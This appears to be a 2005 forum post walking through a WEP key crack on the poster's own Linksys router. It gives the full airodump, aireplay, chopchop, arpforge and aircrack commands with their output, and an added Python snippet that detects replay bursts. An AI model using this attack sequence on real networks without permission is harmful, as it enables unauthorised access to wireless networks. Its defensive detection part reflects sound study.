i just had complete success
I just had complete success.
Sorry again for the long post.
System: Slackware 10 2.4
Card: SMC 2532W-B Elite Connect PCMCIA
(Macs Have Been Changed To Protect The Innocent)
First I set the network state and put the card into monitor mode.
Then I started sniffing for my router and found it,
but I'm not running WPA (maybe a new Linksys firmware trick).
root@tekn0:~# state.wlan wlan0 enable ; monitor.wlan wlan0 6
root@tekn0:~# airodump wlan0 linksys2
BSSID CH MB ENC PWR Packets LAN IP / # IVs ESSID
12:12:12:12:12:12 6 48 WPA -1 100 10 linksys
Then I started aireplay to get a usable data packet.
After a bunch of random packets I decided to try this one for some reason.
root@tekn0:~#./aireplay -i wlan0 -b 12:12:12:12:12:12
(ABOUT 10 PACKETS DOWN I think I pressed "n" about 10 times hehe)
Found one usable WEP data packet:
From DS = 1, To DS = 0
BSSID = 12:12:12:12:12:12
Src. MAC = 34:34:34:34:34:34
Dst. MAC = FF:FF:FF:FF:FF:FF
0x0000: 0842 0000 ffff ffff ffff 0012 173f 9cf2 .B...........?..
0x0010: 0011 9518 3d42 d0c5 a785 0b00 a993 bbb0 ....=B..........
0x0020: bb03 1cde 2151 5b7a 54bc 4d03 b728 d7ab ....!Q[zT.M..(..
0x0030: 1553 cd37 56ee 0be4 f881 46e1 eb15 f75b .S.7V.....F....[
0x0040: 4f40 a83e a88a b7cf b00f 871c 78d0 e6f7 O@.>........x...
0x0050: d50a 8f9d d14d 3753 2528 b7bf 4dcc c226 .....M7S%(..M..&
0x0060: ccf4 53e8 da74 78f1 d158 15ff 0707 9fbe ..S..tx..X......
0x0070: db17 fa4a da42 8e8d 8157 7291 eaa9 7b5f ...J.B...Wr...{_
0x0080: bb4c 5fbd b681 4c09 .L_...L.
Replay this packet ? y
Saving replayed packet in replay-20050202_2102.cap
Next I ran chopchop with the new packet and crossed my fingers. :)
root@tekn0:~# ./chopchop-0.1/chopchop -i wlan0 -b 12:12:12:12:12:12 -m 34:34:34:34:34:34 -p replay-20050202_2102.cap
12:12:12:12:12:12 6
0
34:34:34:34:34:34 6
first pass
-----------------
packet number 001
base src mac: 12 12 12 12 12 12 <-----(THIS WAS DIFFERENT FROM WHAT I ENTERED ON THE COMMAND LINE BUT I CHANGED IT FOR THIS POST)
base dst mac: 34 34 34 34 34 34 <-----(THIS WAS ALSO DIFFERENT)
guess 0xaa / number of frame written 183
guess 0x06 / number of frame written 27
guess 0x85 / number of frame written 156
guess 0x77 / number of frame written 131
guess 0x65 / number of frame written 110
guess 0x01 / number of frame written 25
guess 0xa8 / number of frame written 197
guess 0xc0 / number of frame written 207
guess 0x00 / number of frame written 24
guess 0xe0 / number of frame written 496
guess 0x06 / number of frame written 28
guess 0x00 / number of frame written 27
guess 0xe0 / number of frame written 236
guess 0x93 / number of frame written 158
guess 0x04 / number of frame written 27
guess 0x00 / number of frame written 21
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x20 / number of frame written 66
guess 0x00 / number of frame written 19
guess 0x0c / number of frame written 14
guess 0xc0 / number of frame written 222
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x20 / number of frame written 40
guess 0x00 / number of frame written 14
guess 0x00 / number of frame written 23
guess 0x4f / number of frame written 86
guess 0x42 / number of frame written 80
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 80
guess 0x43 / number of frame written 93
guess 0x41 / number of frame written 93
guess 0x43 / number of frame written 92
guess 0x41 / number of frame written 92
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 92
guess 0x41 / number of frame written 79
guess 0x43 / number of frame written 79
guess 0x41 / number of frame written 71
guess 0x43 / number of frame written 76
guess 0x46 / number of frame written 79
guess 0x45 / number of frame written 92
guess 0x46 / number of frame written 79
guess 0x46 / number of frame written 72
guess 0x42 / number of frame written 86
guess 0x46 / number of frame written 92
guess 0x43 / number of frame written 75
guess 0x46 / number of frame written 78
guess 0x42 / number of frame written 77
guess 0x45 / number of frame written 79
guess 0x4e / number of frame written 105
guess 0x45 / number of frame written 79
guess 0x42 / number of frame written 352
guess 0x45 / number of frame written 73
guess 0x4d / number of frame written 92
guess 0x45 / number of frame written 88
guess 0x20 / number of frame written 53
guess 0x01 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 26
guess 0x01 / number of frame written 22
guess 0x00 / number of frame written 27
guess 0x10 / number of frame written 27
guess 0x29 / number of frame written 53
guess 0x14 / number of frame written 27
guess 0x80 / number of frame written 156
guess 0xda / number of frame written 235
guess 0x6f / number of frame written 131
guess 0x4c / number of frame written 101
guess 0x00 / number of frame written 27
guess 0x89 / number of frame written 149
guess 0x00 / number of frame written 14
guess 0x89 / number of frame written 170
guess 0x00 / number of frame written 27
guess 0xff / number of frame written 261
guess 0x01 / number of frame written 27
guess 0xa8 / number of frame written 176
guess 0xc0 / number of frame written 222
guess 0x65 / number of frame written 123
guess 0x01 / number of frame written 21
guess 0xa8 / number of frame written 182
guess 0xc0 / number of frame written 222
guess 0x94 / number of frame written 157
guess 0xb5 / number of frame written 196
guess 0x11 / number of frame written 27
guess 0x80 / number of frame written 144
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 517
guess 0x44 / number of frame written 70
guess 0x00 / number of frame written 27
guess 0x60 / number of frame written 105
guess 0x00 / number of frame written 27
guess 0x00 / number of frame written 27
guess 0x45 / number of frame written 79
OK
second pass
root@tekn0:~#
Awesome, it worked :) And it only took like 1 min.
Notice there is not any instance of "frame written 13" (maybe that's the unlucky number?)
Then I used arpforge to create the forged packet.
root@tekn0:~# ./arpforge replay-20050202_2102.cap.iv.a7850b00 1 12:12:12:12:12:12 34:34:34:34:34:34 192.168.1.100 192.168.1.1 replay-test.cap
Done.
After that I replayed it.
root@tekn0:~# ./aireplay -r replay-test.cap wlan0
Found one usable WEP data packet:
From DS = 0, To DS = 1
BSSID = 12:12:12:12:12:12
Src. MAC = 34:34:34:34:34:34
Dst. MAC = FF:FF:FF:FF:FF:FF
0x0000: 0841 0201 0012 173f 9cf2 0011 9518 3d42 .A.....?......=B
0x0010: ffff ffff ffff 8001 a785 0b00 a993 bbb0 ................
0x0020: bb03 1cd8 6450 531a 52fc 4d02 3728 f727 ....dPS.R.M.7(.'
0x0030: e8b9 0cfa 9722 0a1b f808 4668 2bf1 9980 ....."....Fh+...
0x0040: 20f6 ba9c ...
Replay this packet ? y
Saving replayed packet in replay-20050202_2107.cap
Open airodump in another console to capture replies.
Sent 300599 packets at 247 pkt/s
Then I captured in airodump for about 20 mins and after 240,000+ IVs aircrack cracked it :)
root@tekn0:~# aircrack -n 64 linksys2.cap
Opening pcap file linksys2.cap
Choosing first WEP-encrypted BSSID = 12:12:12:12:12:12
aircrack 2.1
* Got 248182! unique IVs | fudge factor = 2
* Elapsed time [00:00:01] | tried 4 keys at 240 k/m
KB depth votes
0 0/ 3 AB( 33) F0( 33) ED( 17) 65( 15) C9( 15) AC( 12)
1 0/ 3 CD( 28) 30( 16) 3E( 15) 70( 13) CE( 12) 36( 10)
2 0/ 1 EF( 60) 6A( 21) 6F( 12) 77( 12) 50( 7) 6B( 6)
3 1/ 7 12( 15) 29( 15) 31( 15) 52( 15) 13( 12) 25( 12)
4 0/ 3 34( 27) 58( 15) 5B( 15) 5C( 12) EA( 12) 5E( 11)
KEY FOUND! [ 123456789a ]
EOF.
I hope this helps and thanks again for such amazing work :)
Also I still have the magic packet I used in replay-20050202_2102.cap if needed.
Last edited by tekn0 : 03-03-2005 at 01:52 AM.
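The replay step above (one captured frame re-sent some 300,000 times at about 247 pkt/s, its WEP IV a7850b never changing) leaves a clear signature on the air. As an added example, not part of the post or of the aircrack tools, this Python snippet flags such bursts in a constructed per-frame capture summary; the record format, the thresholds and the sample traffic are assumptions.

```python
"""Detect WEP frame-replay injection from a per-frame capture summary.

Constructed example (not from the post): each record is
(time_s, src_mac, dst_mac, wep_iv_hex) as a wireless IDS might log it.
"""
from collections import Counter, defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"


def build_sample():
    """Constructed capture: light normal traffic, then one frame replayed 250x in 1 s."""
    # Normal WEP traffic: every frame carries a fresh IV.
    frames = [(i * 0.2, "34:34:34:34:34:34", "12:12:12:12:12:12", f"{i:06x}")
              for i in range(5)]
    # Replay burst: identical IV (a7850b, the IV in the post's hex dump), broadcast dst.
    frames += [(1.0 + i / 250, "34:34:34:34:34:34", BROADCAST, "a7850b")
               for i in range(250)]
    return frames


def detect_replay(frames, window=1.0, min_rate=100, min_reuse_ratio=0.9):
    """Flag (src, time window) buckets where one WEP IV dominates a high-rate burst.

    A sending station normally changes its IV per frame, so hundreds of frames
    per second from one source all carrying the same IV is a replay signature.
    Thresholds are assumed values; tune them to the observed WLAN.
    """
    buckets = defaultdict(Counter)   # (src, bucket_idx) -> Counter of IVs seen
    bcast = Counter()                # (src, bucket_idx) -> broadcast frame count
    for t, src, dst, iv in frames:
        key = (src, int(t // window))
        buckets[key][iv] += 1
        if dst == BROADCAST:
            bcast[key] += 1
    alerts = []
    for key, ivs in sorted(buckets.items()):
        total = sum(ivs.values())
        if total < min_rate:
            continue
        iv, hits = ivs.most_common(1)[0]
        if hits / total >= min_reuse_ratio:
            alerts.append({"src": key[0], "window_start": key[1] * window,
                           "frames": total, "iv": iv, "iv_reuse": hits,
                           "broadcast": bcast[key]})
    return alerts


if __name__ == "__main__":
    for alert in detect_replay(build_sample()):
        print(alert)
```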